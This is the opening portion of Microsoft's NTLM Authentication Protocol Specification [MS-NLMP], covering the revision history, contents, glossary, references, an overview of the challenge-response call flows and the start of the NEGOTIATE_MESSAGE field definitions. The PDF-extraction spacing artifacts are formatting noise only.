03/14/2008  6.0.2 Editorial  Revised and edited the technical content.  
05/16/2008  6.0.3 Editorial  Revised and edited the technical content.  
06/20/2008  7.0 Major  Updated and revised the technical content.  
07/25/2008  8.0 Major  Updated and revised the technical content.  
08/29/2008  9.0 Major  Updated and revised the technical content.  
10/24/2008  9.0.1 Editorial  Revised and edited the technical content.  
12/05/2008  10.0 Major  Updated and revised the technical content.  
01/16/2009  11.0 Major  Updated and revised the technical content.  
02/27/2009  12.0 Major  Updated and revised the technical content.  
04/10/2009  12.1 Minor  Updated the technical content.  
05/22/2009  13.0 Major  Updated and revised the technical content.  
07/02/2009  13.1 Minor  Updated the technical content.  
08/14/2009  13.2 Minor  Updated the technical content.  
09/25/2009  14.0 Major  Updated and revised the technical content.  
11/06/2009  15.0 Major  Updated and revised the technical content.  
12/18/2009  15.1 Minor  Updated the technical content.  
01/29/2010  15.2 Minor  Updated the technical content.  
 
3 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Date  Revision 
History  Revision 
Class  Comments  
03/12/2010  16.0 Major  Updated and revised the technical content.  
04/23/2010  16.1 Minor  Updated the technical content.  
06/04/2010  16.2 Minor  Updated the technical content.  
07/16/2010  16.2 No change  No changes to the meaning, language, or formatting of 
the technical content.  
08/27/2010  16.2 No change  No changes to the meaning, language, or formatting of 
the technical content.  
 
4 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Contents  
1   Introduction  ................................ ................................ ................................ .............  7 
1.1   Glossary  ................................ ................................ ................................ ...............  7 
1.2   References  ................................ ................................ ................................ ............  8 
1.2.1   Normative References  ................................ ................................ .......................  8 
1.2.2   Informative References  ................................ ................................ .....................  9 
1.3   Overview  ................................ ................................ ................................ ............  10 
1.3.1   NTLM Authentication Call Flow  ................................ ................................ .........  10 
1.3.1.1   NTLM Connection -Oriented Call Flow  ................................ ...........................  11 
1.3.1.2   NTLM Connectionless (Datagram -Oriented) Call Flow  ................................ .... 12 
1.4   Relationship to Other Protocols  ................................ ................................ ..............  13 
1.5   Prerequisites/Preconditions  ................................ ................................ ...................  14 
1.6   Applicability Statement  ................................ ................................ .........................  14 
1.7   Versioning and Ca pability Negotiation  ................................ ................................ ..... 14 
1.8   Vendor -Extensible Fields  ................................ ................................ .......................  14 
1.9   Standards Assignments  ................................ ................................ ........................  14 
2   Messages ................................ ................................ ................................ ................  15 
2.1   Transport  ................................ ................................ ................................ ............  15 
2.2   Mes sage Syntax  ................................ ................................ ................................ .. 15 
2.2.1   NTLM Messages  ................................ ................................ ..............................  16 
2.2.1.1   NEGOTIATE_MESSAGE  ................................ ................................ ..............  16 
2.2.1.2   CHALLENGE_MESSAGE  ................................ ................................ ..............  19 
2.2.1.3   AUTHENTICATE_MESSAGE  ................................ ................................ .........  22 
2.2.2   NTLM Structures  ................................ ................................ ............................  29 
2.2.2.1   AV_PAIR  ................................ ................................ ................................ .. 29 
2.2.2.2   Restriction_Encoding  ................................ ................................ .................  30 
2.2.2.3   LM_RESPONSE  ................................ ................................ .........................  31 
2.2.2.4   LMv2_RESPONSE  ................................ ................................ ......................  32 
2.2.2.5   NEGOTIATE ................................ ................................ ..............................  33 
2.2.2.6   NTLM v1 Response: NTLM_RESPONSE  ................................ .........................  35 
2.2.2.7   NTLM v2: NTLMv2_CLIENT_CHALLENGE  ................................ ......................  36 
2.2.2.8   NTLM2 V2 Response: NTLMv2_RESPONSE  ................................ ...................  37 
2.2.2.9   NTLMSSP_MESSAGE_SIGNATURE  ................................ ...............................  38 
2.2.2.9.1   NTLMS SP_MESSAGE_SIGNATURE  ................................ .........................  38 
2.2.2.9.2   NTLMSSP_MESSAGE_SIGNATURE for Extended Session Security  ...............  38 
2.2.2.10   VERSION  ................................ ................................ ...............................  39 
3   Protocol Details  ................................ ................................ ................................ ...... 41 
3.1   Client Details  ................................ ................................ ................................ ....... 41 
3.1.1   Abstract Data Model  ................................ ................................ .......................  41 
3.1.1.1   Variables Internal to the Protocol  ................................ ................................  41 
3.1.1.2   Variables Exposed to the Application  ................................ ...........................  42 
3.1.2   Timers  ................................ ................................ ................................ ..........  43 
3.1.3   Initialization  ................................ ................................ ................................ .. 43 
3.1.4   Higher -Layer Triggered Events  ................................ ................................ .........  43 
3.1.5   Message Processing Events and Sequencing Rules  ................................ ..............  44 
3.1.5.1   Connection -Oriented  ................................ ................................ .................  44 
3.1.5.1.1   Client Initiates the NEGOTIATE_MESSAGE  ................................ ..............  44 
3.1.5.1.2   Client Receives a CHALLENGE_MESSAGE from the Server  ........................  45 
3.1.5.2   Connectionless  ................................ ................................ .........................  48 
 
5 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  3.1.5.2.1   Client Receives a CHALLENGE_MESSAGE  ................................ ...............  48 
3.1.6   Timer Events  ................................ ................................ ................................ . 49 
3.1.7   Other Local Events  ................................ ................................ .........................  49 
3.2   Server Details  ................................ ................................ ................................ ..... 49 
3.2.1   Abstract Data Model  ................................ ................................ .......................  49 
3.2.1.1   Variables Internal to the Protocol  ................................ ................................  49 
3.2.1.2   Variables Exposed to the Application  ................................ ...........................  50 
3.2.2   Timers  ................................ ................................ ................................ ..........  50 
3.2.3   Initialization  ................................ ................................ ................................ .. 50 
3.2.4   Higher -Layer Triggered Events  ................................ ................................ .........  50 
3.2.5   Message Processing Events and Sequencing Rules  ................................ ..............  51 
3.2.5.1   Connection -Oriented  ................................ ................................ .................  51 
3.2.5.1.1   Server Receives a NEGOTIATE_MESSAGE from the Client  .........................  51 
3.2.5.1.2   Server Receives an AUTHENTICATE_MESSAGE from the Client  ..................  53 
3.2.5.2   Connectionless NTLM  ................................ ................................ ................  56 
3.2.5.2.1   Server Sends the Client an Initial CHALLENGE_MESSAGE  .........................  56 
3.2.5.2.2   Serve r Response Checking  ................................ ................................ ... 56 
3.2.6   Timer Events  ................................ ................................ ................................ . 57 
3.2.7   Other Local Events  ................................ ................................ .........................  58 
3.3   NTLM v1 and NTLM v2 M essages  ................................ ................................ ...........  58 
3.3.1   NTLM v1 Authentication  ................................ ................................ ..................  58 
3.3.2   NTLM v2 Authentication  ................................ ................................ ..................  59 
3.4   Session Security Details  ................................ ................................ .......................  61 
3.4.1   Abstract Data Model  ................................ ................................ .......................  61 
3.4.2   Message Integrity  ................................ ................................ ...........................  62 
3.4.3   Message Confidentiality  ................................ ................................ ...................  62 
3.4.4   Message Signature Functions  ................................ ................................ ...........  63 
3.4.4.1   NTLMv1 without Extended Session Security  ................................ .................  63 
3.4.4.2   NTLMv1 with Extended Session Security and NTLMv2  ................................ .... 64 
3.4.5   KXKEY, SIGNKEY, and SEALKEY  ................................ ................................ ....... 65 
3.4.5.1   KXKEY  ................................ ................................ ................................ ..... 65 
3.4.5.2   SIGNKEY  ................................ ................................ ................................ . 66 
3.4.5.3   SEALKEY  ................................ ................................ ................................ . 67 
3.4.6   GSS_WrapEx() Call ................................ ................................ .........................  68 
3.4.6.1   Signature Creatio n for GSS_WrapEx()  ................................ .........................  69 
3.4.7   GSS_UnwrapEx() Call  ................................ ................................ .....................  69 
3.4.8   GSS_GetMICEx() Call ................................ ................................ ......................  70 
3.4.8.1   Signature Creation for GSS_GetMICEx()  ................................ ......................  70 
3.4.9   GSS_VerifyMICEx() Call  ................................ ................................ ..................  70 
4   Protocol Examples  ................................ ................................ ................................ .. 72 
4.1   NTLM Over Server Message Block (SMB) ................................ ................................ . 72 
4.2   Cryptographic Values for Validation  ................................ ................................ ........  73 
4.2.1   Common Values  ................................ ................................ .............................  73 
4.2.2   NTLM v1 Authentication  ................................ ................................ ..................  74 
4.2.2.1   Calculations  ................................ ................................ .............................  74 
4.2.2.1.1   LMOWFv1()  ................................ ................................ ........................  74 
4.2.2.1.2   NTOWFv1()  ................................ ................................ ........................  75 
4.2.2.1.3   Session Base Key and Key Exchange Key  ................................ ...............  75 
4.2.2.2   Results  ................................ ................................ ................................ .... 75 
4.2.2.2 .1   NTLMv1 Response  ................................ ................................ ...............  75 
4.2.2.2.2   LMv1 Response  ................................ ................................ ...................  75 
4.2.2.2.3   Encrypted Session Key  ................................ ................................ .........  76 
 
6 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  4.2.2.3   Messages  ................................ ................................ ................................ . 76 
4.2.2.4   GSS_WrapEx Examples  ................................ ................................ .............  76 
4.2.3   NTLM v1 with Client Challenge  ................................ ................................ .........  77 
4.2.3.1   Calculations  ................................ ................................ .............................  78 
4.2.3.1.1   NTOWFv1()  ................................ ................................ ........................  78 
4.2.3.1.2   Session Base Key  ................................ ................................ ................  78 
4.2.3.1.3   Key Exchange Key  ................................ ................................ ...............  78 
4.2.3.2   Results  ................................ ................................ ................................ .... 78 
4.2.3.2.1   LMv1 Response  ................................ ................................ ...................  78 
4.2.3.2.2   NTLMv1 Response  ................................ ................................ ...............  79 
4.2.3.3   Messages  ................................ ................................ ................................ . 79 
4.2.3.4   GSS_WrapEx Examples  ................................ ................................ .............  79 
4.2.4   NTLMv2 Authenti cation  ................................ ................................ ...................  80 
4.2.4.1   Calculations  ................................ ................................ .............................  81 
4.2.4.1.1   NTOWFv2() and LMOWFv2()  ................................ ................................ . 81 
4.2.4.1.2   Session Base Key  ................................ ................................ ................  81 
4.2.4.2   Results  ................................ ................................ ................................ .... 81 
4.2.4.2.1   LMv2 Response  ................................ ................................ ...................  81 
4.2.4.2.2   NTLMv2 Response  ................................ ................................ ...............  81 
4.2.4.2.3   Encrypted Session Key  ................................ ................................ .........  82 
4.2.4.3   Messages  ................................ ................................ ................................ . 82 
4.2.4.4   GSS_WrapEx Examples  ................................ ................................ .............  82 
5   Security  ................................ ................................ ................................ ..................  84 
5.1   Security Considerations for Implementers  ................................ ...............................  84 
5.2   Index of Security Parameters  ................................ ................................ ................  84 
6   Appendix A: Cryptographic Operations Reference  ................................ ..................  85 
7   Appendix B: Product Behavior  ................................ ................................ ................  88 
8   Change Tracking ................................ ................................ ................................ ..... 94 
9   Index  ................................ ................................ ................................ .....................  95 
 
7 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  1   Introduction  
The NT LAN Manager (NTLM) Authentication Protocol is used in Microsoft Windows® for 
authentication between clients and servers.  
For Microsoft Windows®  2000 Server operating system, Windows®  XP operating system, Windows 
Server®  2003 operating system, Windows  Vista® operating system, and Windows Server®  2008 
operating system, Kerberos authentication [MS-KILE] replaces NTLM as the preferred authentication 
protocol. These extensions provide additional capability for authorization information including group 
memberships, interactive logon information and integrity levels, as well as constrained delegation 
and encryption supported by Kerberos principals.  
However, NTLM can be used when the Kerberos Protocol Extensions (KILE) do not work, such as in 
the following scenarios.  
One of the machines is not Kerberos -capable.  
The server is not joined to a domain.  
The KILE configuration is not set up correctly.  
The implementation chooses to directly use NLMP.  
  
1.1   Glossary  
The following terms are defined in [MS-GLOS] : 
Active Directory  
checksum  
code page  
directory  
domain  
domain controller (DC)  
domain name (3)  
forest  
fully qualified domain name (FQDN) (1) (2)  
Kerberos  
key 
message authentication code (MAC)  
nonce  
original equipment manufacturer (OEM) character set  
remote procedure call (RPC)  
Security Support Provider Interface (SSPI)  
service  
session  
session key  
Unicode  
The following terms are specific to this document:  
AV pai r: A term for "attribute/value pair." An attribute/value pair is the name of some attribute, 
along with its value. AV pairs in NTLM have a structure specifying the encoding of the 
information stored in them.  
 
8 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  challenge: A piece of data used to authenticate a user. A challenge  typically takes the form of 
a nonce . 
connection oriented NTLM: A particular variant of NTLM designed to be used with connection 
oriented remote procedure call (RPC).  
cyclic redundancy check (CRC): An algorith m used to produce a checksum  (that is, a small, 
fixed number of bits) against a block of data, such as a packet of network traffic or a block of 
a computer file. The CRC is used to detect errors after transmission or storage. A CRC is 
designed to catch stochastic errors, as opposed to intentional errors. If errors might be 
introduced by a motivated and intelligent adversary, a cryptographic hash function should be 
used instead.  
FILETIME: The date and time as a 64 -bit value in lit tle-endian order representing the number of 
100-nanosecond intervals elapsed since January 1, 1601 (UTC).  
forest tree name: A forest tree name  is the first domain name  in a Microsoft Active 
Directory  forest  when the forest  was created.  
identify level token: A security token resulting from authentication that represents the 
authenticated user but does not allow the servi ce holding the token to impersonate that user 
to other resources.  
key exchange key: The key used to protect the session key  that is generated by the client. 
The key exchange key  is derived from the response key  during authentication.  
LMOWF(): A one -way function used to generate a key based on the user's password.  
LMOWF: The result generated by the LMOWF()  function.  
NTOWF(): A one -way function (similar to the LMOWF  function) used to generate a key based 
on the user's password.  
NTOWF: The result generated by the NTOWF()  function.  
response key: A key generated by a one -way function from the name of the user, the name of 
the user's domain, and the password. The function depends on which version of NTLM is being 
used. The response key  is used to derive the key exchange key . 
sequence number: In the NTLM protocol, a sequence number can be explicitly provided by the 
application p rotocol, or generated by NTLM. If generated by NTLM, the sequence number is 
the count of each message sent, starting with 0.  
session security: The provision of message integrity and/or confidentiality through use of a 
session ke y. 
MAY, SHOULD, MUST, SHOULD NOT, MUST NOT: These terms (in all caps) are used as 
described in [RFC2119] . All statements of optional behavior use either MAY, SHOULD, or 
SHOULD NOT.  
1.2   References  
1.2.1   Normative References  
We conduct frequent surveys of the normative references to assure their continued availability. If 
you have any issue with finding a normative reference, please contact dochelp@microsoft.com . We 
will assist you in finding the relevant information. Please check the archive site, 
 
9 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  http://msdn2.microsoft.com/en -us/library/E4BD6494 -06AD -4aed-9823-445E921C9624 , as an 
additional source.  
[FIPS46 -2] National Institute of Standards and Technology, "Federal Information Processing 
Standards Publication 46 -2: Data Encryption Standard (DES)", December 1993, 
http://www.itl.nist.gov/fipspubs/fip46 -2.htm  
[MS-APDS] Microsoft Corporation, " Authentication Protocol Domain Support Specification ", June 
2007.             
[MS-DTYP] Microsoft Corporation, " Windows Data Types ", January 2007.             
[MS-RPCE] Microsoft Corporation, " Remote Procedure Call Protocol Extensions ", January 2007.             
[MS-SMB] Microsoft Corporation, " Server  Message Block (SMB) Protocol Specification ", July 2007.             
[MS-SPNG] Microsoft Corporation, " Simple and Protected Generic Security Service Application 
Program Interface Negotiation Mechanism (SPNEGO) Protocol Extension s", January 2007.             
[RFC1320] Rivest, R., "The MD4 Message -Digest Algorithm", RFC 1320, April 1992, 
http://www.ietf.org/rfc/rfc1320.txt  
[RFC1321] Rivest, R., "The MD5 Message -Digest Algor ithm", RFC 1321, April 1992, 
http://www.ietf.org/rfc/rfc1321.txt  
[RFC2104] Krawczyk, H., Bellare, M., and Canetti, R., "HMAC: Keyed -Hashing for Message 
Authentication", RFC 2104, February 1997, http://www.ietf.org/rfc/rfc2104.txt  
[RFC2119] Bradner, S., "Key words for use in RFCs to Indicate Requirement Levels", BCP 14, RFC 
2119, March 1997, http://www.ietf.org/rfc/rfc2119.txt  
[RFC2743] Linn, J., "Generic Security Service Application Program Interface Version 2, Update 1", 
RFC 2743, January 2000, http://www.ietf.org/rfc/rfc2743 .txt 
[RFC2744] Wray, J., "Generic Security Service API Version 2 : C -bindings", RFC 2744, January 
2000, http://www.ietf.org/rfc/rfc2744.txt  
[RFC4121] Zhu, L., Jaganathan, K., and Hartman, S., "The  Kerberos Version 5 Generic Security 
Service Application Program Interface (GSS -API) Mechanism: Version 2", RFC 4121, July 2005, 
http://www.ietf.org/rfc/rfc4121.txt  
[RFC4757] Jaganathan, K., Zhu, L., and Brezak, J., "The RC4 -HMAC Kerberos Encryption Types 
Used by Microsoft Windows", RFC 4757, December 2006, http://www.ietf.org/rfc/rfc4757.txt  
1.2.2   Informative References  
[MS-GLOS] Microsoft Corporation, " Windows Protocols Master Glossary ", March 2007.             
[MS-KILE] Microsoft Corporation, " Kerberos Protocol Extensions ", January 2007.             
[MS-NTHT] Microsoft Corporation, " NTLM Over HTTP Protocol Specification ", January 2007.             
[MS-SMB] Microsoft Corporation, " Server Message Block (SMB) Protocol Spe cification ", July 2007.             
[MSDN -DecryptMsg] Microsoft Corporation, "DecryptMessage (General) Function", 
http://msdn.microsoft.com/en -us/library/aa375211.aspx  
 
10 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  [MSDN -EncryptMsg] Microsoft Corporation, "EncryptMessage (General)", 
http://msdn.microsoft.com/en -us/library/aa375378.aspx  
1.3   Overview  
NT LAN Manager (NTLM) is the name of a family of security protocols in Microsoft Windows®. NTLM 
is used by application protocols to authenticate remote users and, optionally, to provide session 
security  when requested by the application.  
NTLM is a challenge -response style authentication protocol. This means that to authenticate a user, 
the server sends a challenge to the client. The client then sends back a response that is a functio n of 
the challenge, the user's password, and possibly other information. Computing the correct response 
requires knowledge of the user's password. The server (or another party trusted by the server) can 
validate the response by consulting an account databa se to get the user's password and computing 
the proper response for that challenge.  
The NTLM protocols are embedded protocols. Unlike stand -alone application protocols such as [MS-
SMB]  or HTTP, NTLM messages are embedded in the p ackets of an application protocol that requires 
authentication of a user. The application protocol semantics determine how and when the NTLM 
messages are encoded, framed, and transported from the client to the server and vice versa. See 
section 4 for an example of how NTLM messages are embedded in the SMB Version 1.0 Protocol as 
specified in [MS -SMB]. The NTLM implementation also differs from normal protocol implementations, 
in that the best way to implemen t it is as a function library called by some other protocol 
implementation (the application protocol), rather than as a layer in a network protocol stack. For 
more information about GSS -API calls, see section 3.4.6 . The NTLM function library receives 
parameters from the application protocol caller and returns an authentication message that the 
caller places into fields of its own messages as it chooses. Nevertheless, if one looks at just the 
NTLM messages a part from the application protocol in which they are embedded, there is an NTLM 
protocol and that is what is specified by this document.  
There are two major variants of the NTLM authentication protocol: the connection -oriented  
variant a nd the connectionless variant. In the connectionless (datagram) variant:  
NTLM does not use the internal sequence number  maintained by the NTLM implementation. 
Instead, it uses a sequence number passed in by the protocol implementation i n which NTLM is 
embedded.  
Keys  for session security are established at client initialization time (while in connection -oriented 
mode they are established only at the end of authentication exchange), and session security can 
be used as soon as the session keys  are established.  
It is not possible to send a NEGOTIATE message (see section 2.2.1.1 ). 
Each of these variants has three versions: LM, NTLMv1, and  NTLMv2. The message flow for all three 
is the same; the only differences are the function used to compute various response fields from the 
challenge, and which response fields are set. <1> 
In addition to authentication, the NTLM proto col optionally provides for session security —specifically 
message integrity and confidentiality through signing and sealing functions in NTLM.  
1.3.1   NTLM Authentication Call Flow  
This section provides an overview of the end -to-end message flow when application protocols use 
NTLM to authenticate a user to a server.  
 
11 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  The following diagram shows a typical connection -oriented message flow when an application uses 
NTLM. The message flow typically consists of a number of application messages, followed by NTLM 
authentication messages (which are embedded in the application p rotocol and transported by the 
application from the client to the server), and then additional application messages, as specified in 
the application protocol.  
 
Figure 1: Typical NTLM authentication message flow  
Note   In the preceding diagram, the embedding of NTLM messages in the application protocol is 
shown by placing the NTLM messages within [ ] brackets. NTLM messages for both connection -
oriented and connectionless authentication are embedded in the application protoc ol as shown. 
Variations between the connection -oriented and connectionless NTLM protocol sequence are 
documented in sections 1.3.1.1  and 1.3.1.2 . 
After an  authenticated NTLM session  is established, the subsequent application messages may 
optionally be protected with NTLM session security. This is done by the application, which specifies 
what options (such as message integrity or confidentiality, as specified in the Abstract Data Model) 
it requires, before the NTLM authentication message sequence begins. <2> 
Success and failure messages that are sent after the NTLM authentication message sequence are 
specific to  the application protocol invoking NTLM authentication and are not part of the NTLM 
Authentication Protocol.  
Note   In subsequent message flows, only the NTLM message flows are shown because they are the 
focus of this document. Keep in mind that the NTLM me ssages in this section are embedded in the 
application protocol and transported by that protocol.  
An overview of the connection -oriented and connectionless variants of NTLM is provided in the 
following sections.  
1.3.1.1   NTLM Connection -Oriented Call Flow  
The following illustration shows a typical NTLM connection -oriented call flow when an application 
protocol creates an authenticated session. For detailed message specifications, see section 2. The 
messages are processed (section 3).  

 
12 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
Figure 2: Connection -oriented NTLM message flow  
1. Application -specific protocol messages are sent between client and server.  
2. The NTLM protocol begins when the application requires an authenticated session.  The client 
sends an NTLM NEGOTIATE_MESSAGE message t o the server. This message specifies the desired 
security features of the session.  
3. The server sends an NTLM CHALLENGE_MESSAGE message to the client. The message includes 
agreed upon security features, and a nonce  that the server  generates.  
4. The client sends an NTLM AUTHENTICATE_MESSAGE message to the server. The message 
contains the name of a user and a response that proves that the client has the user's password. 
The server validates the response sent by the client. If the user n ame is for a local account, it 
can validate the response by using information in its local account database. If the user name is 
for a domain account, it can validate the response by sending the user authentication information 
(the user name, the challenge  sent to the client, and the response received from the client) to a 
domain controller (DC)  that can validate the response. (Section 3.1 [MS-APDS] ). The NTLM 
protocol compl etes. 
5. If the challenge and the response prove that the client has the user's password, the 
authentication succeeds and the application protocol continues according to its specification. If 
the authentication fails, the server may send the status in an appl ication protocol –specified way, 
or it may simply terminate the connection.  
1.3.1.2   NTLM Connectionless (Datagram -Oriented) Call Flow  
The following illustration shows a typical NTLM connectionless (datagram -oriented) call flow.  

 
13 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
Figure 3: Connectionless NTLM message flow  
Although it appears that the server is initiating the request, the client initiates the sequence by 
sending a message specified by the application protocol in use.  
1. Application -specif ic protocol messages are sent between client and server.  
2. The NTLM protocol begins when the application requires an authenticated session.  The server 
sends the client an NTLM CHALLENGE_MESSAGE message. The message includes an indication of 
the security fea tures desired by the server, and a nonce that the server generates.  
3. The client sends an NTLM AUTHENTICATE_MESSAGE message to the server. The message 
contains the name of a user and a response that proves that the client has the user's password. 
The server validates the response sent by the client. If the user name is for a local account, it 
can validate the response by using information in its local account database. If the user name is 
for a domain account, it validates the response by sending the user aut hentication information 
(the user name, the challenge sent to the client, and the response received from the client) to a 
DC that can validate the response. (Section 3.1 [MS-APDS] ). The NTLM protocol completes.  
4. If the challenge and the response prove that the client has the user's password, the 
authentication succeeds and the application protocol continues according to its specification. If 
the authentication fails, the server may send the status in an  application protocol –specified way, 
or it may simply terminate the connection.  
1.4   Relationship to Other Protocols  
Because NTLM is embedded in the application protocol, it does not have transport dependencies of 
its own.  
NTLM is used for authentication by several application protocols, including server message block 
[MS-SMB]  (SMB), and [MS-NTHT]  (HTTP). For an example of how NTLM is used in SMB, see section 
4. 
Other protocols invoke NTLM as a function library. The i nterface to that library is specified in GSS -
API [RFC2743] . The NTLM implementation of GSS -API calls is specified in section 3.4.6 .<3> 

 
14 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  1.5   Prerequisites/Preconditions  
To use NTLM or to use the NTLM security support provider (SSP), a client is required to have a 
shared secret with the server or domain controller (DC) when using a domain account.  
1.6   Applicability Statement  
An implementer may use the NTLM Authentication Protocol to provide for client authentication 
(where the server verifies the client's identity) for applications. Because NTLM does not provide for 
server authentication, applications that use NTLM are suscept ible to attacks from spoofed servers. 
Applications are therefore discouraged from using NTLM directly. If it is an option, authentication via 
KILE is preferred. <4> 
1.7   Versioning and Capability Negotiation  
The NTLM authentication version is not negotiated by the protocol. It must be configured on both 
the client and the server prior to authentication. The version is selected by the client, and requested 
during the protocol negotiation. If the server does not  support the version selected by the client, 
authentication fails.  
NTLM implements capability negotiation by using the flags described in section 2.2.2.5 . The protocol 
messages used for negotiation depend on the mode of NTLM being used:  
In connection -oriented NTLM, negotiation starts with a NEGOTIATE_MESSAGE, carrying the 
client's preferences, and the server replies with NegotiateFlags in the subsequent 
CHALLENGE_MESSAGE.  
In connectionless NTLM, the server starts the negotiation with the CHALLENGE_MESSAGE and 
the client replies with NegotiateFlags in the subsequent AUTHENTICATE_MESSAGE.  
1.8   Vendor -Extensible Fields  
None.  
1.9   Standards Assignments  
None.  
 
15 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  2   Messages  
2.1   Transport  
NTLM messages are passed between the client and server. The NTLM messages MUST be embedded 
within the application protocol that is using NTLM authentication. NTLM itself does not establish any 
transport connections.  
2.2   Message Syntax  
The NTLM Authentication Protocol consists of three message types used during authentication and 
one message type used for message integrity after authentication has occurred.  
The authentication messages:  
NEGOTIATE_MESSAGE  (2.2.1.1 ) 
CHALLENGE_MESSAGE  (2.2.1.2 ) 
AUTHENTICATE_MESSAGE  (2.2.1.3 ) 
are variable -length messages containing a fixed -length header and a variable -sized message 
payload. The fixed -length head er always starts as shown in the following table with a Signature  
and MessageType  field.  
Depending on the MessageType  field, the message may have other message -dependent fixed -
length fields. The fixed -length fields are then followed by a variable -length m essage payload.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Signature  
... 
MessageType  
MessageDependentFields  
... 
... 
payload (variable)  
... 
Signature (8 bytes):  An 8-byte character array that MUST contain the ASCII string ('N', 'T', 'L', 
'M', 'S', 'S', 'P', ' \0'). 
 
16 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  MessageType (4 bytes):  The MessageType  field MUST take one of the values from the 
following list:  
Value  Meaning  
NtLmNegotiate  
0x00000001  The message is a NEGOTIATE_MESSAGE.  
NtLmChallenge  
0x00000002  The message is a CHALLENGE_MESSAGE.  
NtLmAuthenticate  
0x00000003  The message is an AUTHENTICATE_MESSAGE.  
MessageDependentFields (12 bytes):  The NTLM message contents, as specified in section 
2.2.1 . 
payload (variable):  The payload data contains a message -dependent number of individual 
payload messages. This payload data is referenced by byte offsets located in the 
MessageDependentFields . 
The me ssage integrity message, NTLMSSP_MESSAGE_SIGNATURE (section 2.2.2.9 ) is fixed length 
and is appended to the calling application's messages. This message type is used only when an 
application has requested message integrity or confidentiality operations, based on the session key 
negotiated during a successful authentication.  
All multiple -byte values are encoded in little -endian byte order. Unless specified otherwise, 16 -bit 
value fields are of type unsigned short, while 32 -bit value fields are of type unsigned long.  
All character string fields in NEGOTIATE_MESSAGE contain characters in the OEM character set . As 
specified in section 2.2.2.5 , the client and server negotiate if they both support Unicode characters —
in which case, all character string fields in the CHALLENGE_MESSAGE and 
AUTHENTICATE_MESSAGE contain UNICODE_STRING unless otherwise specified. Otherwise, the 
OEM character s et is used. Agreement between client and server on the choice of OEM character set 
is not covered by the protocol and MUST occur out -of-band.  
All Unicode strings are encoded with UTF -16 and the Byte Order Mark (BOM) is not sent over the 
wire. NLMP uses lit tle-endian order unless otherwise specified.  
2.2.1   NTLM Messages  
2.2.1.1   NEGOTIATE_MESSAGE  
The NEGOTIATE_MESSAGE defines an NTLM Negotiate message that is sent from the client to the 
server. This message allows the client to specify its supported NTLM options to the server.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Signature  
... 
 
17 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  MessageType  
NegotiateFlags  
DomainNameFields  
... 
WorkstationFields  
... 
Version  
... 
Payload (variable)  
... 
Signature (8 bytes):  An 8-byte character array that MUST contain the ASCII string ('N', 'T', 'L', 
'M', 'S', 'S', 'P', ' \0'). 
MessageType (4 bytes):  A 32-bit unsigned integer that indicates the message type. This field 
MUST be set to 0x00000001.  
NegotiateFlags (4 bytes):  A NEGOTIATE  structure that contains a set of bit flags, as defined 
in section 2.2.2.5 . The client sets flags to indicate options it supports.  
DomainNameFields  (8 bytes):  If the NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED flag is 
not set in NegotiateFlags , indicating that no DomainName  is supplied in Payload : 
DomainNameLen  and DomainNameMaxLen  fields SHOULD be set to zero.  
DomainNameBufferOffset  field SHOULD be set t o the offset from the beginning of the 
NEGOTIATE_MESSAGE to where the DomainName  would be in Payload  if it was present.  
DomainNameLen , DomainNameMaxLen , and DomainNameBufferOffset  MUST be 
ignored on receipt.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
DomainNameLen  DomainNameMaxLen  
DomainNameBufferOffset  
 
